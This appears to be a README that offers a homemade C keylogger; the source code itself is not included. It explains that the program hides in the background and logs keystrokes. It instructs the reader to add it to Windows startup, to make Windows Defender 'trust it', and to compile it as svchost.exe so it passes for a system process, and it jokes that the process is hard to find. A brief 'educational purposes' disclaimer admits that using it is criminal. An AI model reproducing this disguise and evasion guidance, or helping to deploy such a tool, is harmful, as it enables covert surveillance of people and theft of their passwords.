This is a small keylogger code I made back in 2007.
When you double-click the exe file, it will go to the background and write to a file called svchost.log. The log will be located where the exe is located.
Add it to Windows startup if you want it to run automatically.
Windows Defender in Windows 10 can detect this. Don't forget to let Windows "trust it."
To kill it, go to Task Manager. Good luck finding which one. Hehe.
I am not liable for anything you do with it. This is criminal in many jurisdictions. This is for educational purposes only.
- Download GCC compiler
- Run
gcc logger.c -o svchost.exe